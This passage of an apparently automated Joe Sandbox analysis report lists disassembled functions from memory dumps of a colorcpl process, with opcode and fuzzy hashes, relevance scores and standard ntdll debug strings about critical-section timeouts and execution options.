                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_68b0000_colorcpl.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7082bc8f8abd59ec1a03103dfd6fbce07cccd21098daebae6e01f94422e85f0e
                                                                                                    • Instruction ID: 8567dee77a726685c2361cf9390b382746215e288fc57c3d5822ea6d3410779b
                                                                                                    • Opcode Fuzzy Hash: 7082bc8f8abd59ec1a03103dfd6fbce07cccd21098daebae6e01f94422e85f0e
                                                                                                    • Instruction Fuzzy Hash: 9AC02222A8AA89A247190F24B800072FBA4E4C3036B1022EEC888AB02142028420C296
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E633EE1 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dccb39677a77acfa7b76c1066adfcf99e81963405b85bfec7f4008de25bbbb96
                                                                                                    • Instruction ID: 6664a77ff14457aa193659ec9ec943e1d54be4c9f6bfa96c48598dd90e77e943
                                                                                                    • Opcode Fuzzy Hash: dccb39677a77acfa7b76c1066adfcf99e81963405b85bfec7f4008de25bbbb96
                                                                                                    • Instruction Fuzzy Hash: 8CD05E72C52561CFC7618B88DA45F5A77FAFF95B10FE20256D424A3750C379EC00D684
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E669DAF Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 79cef0f67be2dbb3f177943ff143ddbb7a2ebc0bcca8e605d777b7589823809d
                                                                                                    • Instruction ID: c401e6b5ae62c12c960a70b623a6c813e2e90c3a9104c1dbfe6765628a2945e0
                                                                                                    • Opcode Fuzzy Hash: 79cef0f67be2dbb3f177943ff143ddbb7a2ebc0bcca8e605d777b7589823809d
                                                                                                    • Instruction Fuzzy Hash: E8D05E32C11870DBCBA39B49CA44F4A7BBAEFC4B10FD50264AD50A3211C73CAC10CB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66BE17 Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 307bdae496b1629aa071e6d7971fb3d8e018be099ba395b1f02024d1b346273a
                                                                                                    • Instruction ID: c3060dc064dea2f849869a805cb00a0f991a38b7e519b48b6853c0ab8e7996f8
                                                                                                    • Opcode Fuzzy Hash: 307bdae496b1629aa071e6d7971fb3d8e018be099ba395b1f02024d1b346273a
                                                                                                    • Instruction Fuzzy Hash: 02E0E2361909C5CFC732CB04C944FA873A1F704B80FC505B0E1094BDB5CBBCA984EA40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65B919 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e760a4ad3564b3af300f3acb6abb57938ec9b0200c8c8c7ccef3f332a9657571
                                                                                                    • Instruction ID: 87a5bc9c5fcf796e617fbe9c0ddc7cd6cbd364ee69dfd331d0e844d79b011835
                                                                                                    • Opcode Fuzzy Hash: e760a4ad3564b3af300f3acb6abb57938ec9b0200c8c8c7ccef3f332a9657571
                                                                                                    • Instruction Fuzzy Hash: 1BD0C932E616CACAEB029F50CD14778B7B2BF03395FD81664D44A06A61833A5C46DE04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6B3FD7 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2d0de6f1a536bfa14fe53989032a97397166e8f78fb9c628f612a51a4f10f55a
                                                                                                    • Instruction ID: c27e40b535f491aaa9c4448c2bb00d01888f5cb6074acc5c2c40b068f2c4309d
                                                                                                    • Opcode Fuzzy Hash: 2d0de6f1a536bfa14fe53989032a97397166e8f78fb9c628f612a51a4f10f55a
                                                                                                    • Instruction Fuzzy Hash: FAC08037080148BBCB125F45CC00F057F2AF754B60F114010F6040A571C632E960E744
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62DCA0 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                                                    • Instruction ID: 62e230d0a216f8112737f65368ce1e545c488ec5b21747c49c0ca8dc2da549c2
                                                                                                    • Opcode Fuzzy Hash: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                                                    • Instruction Fuzzy Hash: 76C08C30381A409AEB221B20CD01B0037A6BB10B00FC104B0A301D94F0DBB8D800EA00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62BA10 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 427ca6eb96b90581979905a4aca713d96a8f2b591aa70216cf78c0d13fec8dd2
                                                                                                    • Instruction ID: b440b7bd9d5f10ae7cc2226edf1b07aef55a9c4f0e6c4ec28c3c82e485ebd6f6
                                                                                                    • Opcode Fuzzy Hash: 427ca6eb96b90581979905a4aca713d96a8f2b591aa70216cf78c0d13fec8dd2
                                                                                                    • Instruction Fuzzy Hash: 14C08C32180288BBC712AA91CD01F027B69E790BA0F500431B60446560C632E820D588
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62D860 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 530c4b8706d5b4739cf7fca0d4ec2140365bb19b351e9e952cee3bb353013ca1
                                                                                                    • Instruction ID: ca5f3b5ab39f7db62961c7fd7c9361094df0d0d09f5c1ca6044a453fb244f855
                                                                                                    • Opcode Fuzzy Hash: 530c4b8706d5b4739cf7fca0d4ec2140365bb19b351e9e952cee3bb353013ca1
                                                                                                    • Instruction Fuzzy Hash: 90C012392A1AC28BCB01CA29C690A8837E0B740640BC60AD0E9808BB11D218E442CA00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E645E40 Relevance: .0, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                                                    • Instruction ID: 5f7d069b4d86b6e74e95273a2f0536df7947f4c1a202ba70107af0dab682fae2
                                                                                                    • Opcode Fuzzy Hash: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                                                    • Instruction Fuzzy Hash: 32C08C32080288BBC7126A81CC00F027B2AE790B60F500020B6040A9718632ECA0D988
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6B1F13 Relevance: .0, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d5cfd273907e73ea4dac16a05e06ead9d4cff632145b002fd22589196fc6b546
                                                                                                    • Instruction ID: 0b69e21f7f33dcbb41217426496c7d95ad02cdcd9f8dc5a8c87b1ba7603eff97
                                                                                                    • Opcode Fuzzy Hash: d5cfd273907e73ea4dac16a05e06ead9d4cff632145b002fd22589196fc6b546
                                                                                                    • Instruction Fuzzy Hash: 52D01270A1A1C1DEE70ACB6861915013FE8BB0EB00B4648AEE046C7301C6244109C715
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62BAE0 Relevance: .0, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 24e2e236a666f9bb1d1a1b83819c978e318f65d854f46dc04eb5f7dcdd2b4c2a
                                                                                                    • Instruction ID: ed49787714cd8c315335b1646a361a50244a45cdd3146083bda90895bd3fc7d8
                                                                                                    • Opcode Fuzzy Hash: 24e2e236a666f9bb1d1a1b83819c978e318f65d854f46dc04eb5f7dcdd2b4c2a
                                                                                                    • Instruction Fuzzy Hash: 6BC08C32080288BBC7126A42CD00F017B29E7A0BA0F500020B6040A5608632E860D588
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65BADA Relevance: .0, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                                    • Instruction ID: dd420be002dc9e299c66e67bcc087e41876a5c364a2e3a42ac02354caff28fca
                                                                                                    • Opcode Fuzzy Hash: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                                    • Instruction Fuzzy Hash: 8EC02B343514C09ADB055B30CC40F103355FB00B60FF007547231468F0CA68AC00DA04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E63FDA9 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5fd49143fa49102544c2963eb9d090727d6c92543d1f0f36e433bd1cea946303
                                                                                                    • Instruction ID: d159260bd9cc47f9739ac411ea846f7b144f0fd5a7c051e2dd6816b6dd600ab9
                                                                                                    • Opcode Fuzzy Hash: 5fd49143fa49102544c2963eb9d090727d6c92543d1f0f36e433bd1cea946303
                                                                                                    • Instruction Fuzzy Hash: FAB01232C11580CFCF02DF40DA00B197332FB40720F254850A00017920C338F802CB80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BDE9B Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                    • Instruction ID: 1627670364bebc66080de02f8542e74ac6891be69eb347d07c447c82b01ab2d1
                                                                                                    • Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                    • Instruction Fuzzy Hash: EDA0113A022A80ABCB02AB00CA00B00B320BB00B20FE008A0A000028208228A8008A00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BDF10 Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                    • Instruction ID: 1627670364bebc66080de02f8542e74ac6891be69eb347d07c447c82b01ab2d1
                                                                                                    • Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                    • Instruction Fuzzy Hash: EDA0113A022A80ABCB02AB00CA00B00B320BB00B20FE008A0A000028208228A8008A00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BDDB1 Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                    • Instruction ID: 1627670364bebc66080de02f8542e74ac6891be69eb347d07c447c82b01ab2d1
                                                                                                    • Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                    • Instruction Fuzzy Hash: EDA0113A022A80ABCB02AB00CA00B00B320BB00B20FE008A0A000028208228A8008A00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E667630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E6A46FC
                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 1E6A4787
                                                                                                    • ExecuteOptions, xrefs: 1E6A46A0
                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E6A4655
                                                                                                    • Execute=1, xrefs: 1E6A4713
                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E6A4742
                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E6A4725
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                    • API String ID: 0-484625025
                                                                                                    • Opcode ID: f91dcc8c5593fff84d0345b327db120e2c9abf4d77c353b478295e8064176417
                                                                                                    • Instruction ID: 6c3ce5855a4311064135f8c87dfbd15a0af000e59fe27311348c9bfad91e243c
                                                                                                    • Opcode Fuzzy Hash: f91dcc8c5593fff84d0345b327db120e2c9abf4d77c353b478295e8064176417
                                                                                                    • Instruction Fuzzy Hash: 01516735A11259BBEF008BA4DC94FAA7BA9EF4D300F8007A9D504EB190FB35BE41CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E67B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm
                                                                                                    • String ID: +$-$0$0
                                                                                                    • API String ID: 1302938615-699404926
                                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                    • Instruction ID: c6cd33ebbd08f783cff5f0c2d9a1fcb18fcf5b19e0746291b810655d6a0d76e4
                                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                    • Instruction Fuzzy Hash: C381C270E152498EEF04CF68C8A17EEBBB3AF46320F94475ADB63A7295C7349940CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E6A02BD
                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E6A02E7
                                                                                                    • RTL: Re-Waiting, xrefs: 1E6A031E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                    • API String ID: 0-2474120054
                                                                                                    • Opcode ID: 7e99cc1e0bfe686d8bc44ea8f2c09b072617ac2c601a77a13eae634b6c160e37
                                                                                                    • Instruction ID: 1e65901a6066a053771bc27bda96a3ec6079ab5be71a6dbfeedad77316708d71
                                                                                                    • Opcode Fuzzy Hash: 7e99cc1e0bfe686d8bc44ea8f2c09b072617ac2c601a77a13eae634b6c160e37
                                                                                                    • Instruction Fuzzy Hash: A8E1AF30A047829FD711CF28C894B5ABBE2AF85354F904B2DE5A58B3E1D775E984CB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 1E6A7B7F
                                                                                                    • RTL: Resource at %p, xrefs: 1E6A7B8E
                                                                                                    • RTL: Re-Waiting, xrefs: 1E6A7BAC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 0-871070163
                                                                                                    • Opcode ID: e5d506ce87e45b9542ea412c20912ad556d7fe5d5178a216074600726bbfc4c7
                                                                                                    • Instruction ID: f0922d452ff38505f19dac15811ec20a784ae80eae5225e158604b2565eb6c21
                                                                                                    • Opcode Fuzzy Hash: e5d506ce87e45b9542ea412c20912ad556d7fe5d5178a216074600726bbfc4c7
                                                                                                    • Instruction Fuzzy Hash: D641FD35B117428FC710CE29CC40B5AB7E6EF89720F800B2DE99A9B290DB31F805CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E66B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E6A728C
                                                                                                    Strings
                                                                                                    • RTL: Resource at %p, xrefs: 1E6A72A3
                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 1E6A7294
                                                                                                    • RTL: Re-Waiting, xrefs: 1E6A72C1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 885266447-605551621
                                                                                                    • Opcode ID: 9fd64232789ebd505ee80dbb24d0d163018946e0a757c75b7cea38ddfd07ef37
                                                                                                    • Instruction ID: f56e035786a4b63c8d95f60c90e742348ef9ba19b6b978b0c5e214f236f73730
                                                                                                    • Opcode Fuzzy Hash: 9fd64232789ebd505ee80dbb24d0d163018946e0a757c75b7cea38ddfd07ef37
                                                                                                    • Instruction Fuzzy Hash: 7C41F035B01286ABC710CE25CC41F5AB7A6FF89714F900B29F956AB240DB75F842CBD5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E677D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm
                                                                                                    • String ID: +$-
                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                    • Instruction ID: 8159a5b0808d8b077caaaa49428063fae229ddc649871b481941e0f6fcc6e863
                                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                    • Instruction Fuzzy Hash: 9691E771E0021A9BDB14CF69D9906AEB7B6FF46362FD0471AE861E72C4D73CA940CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%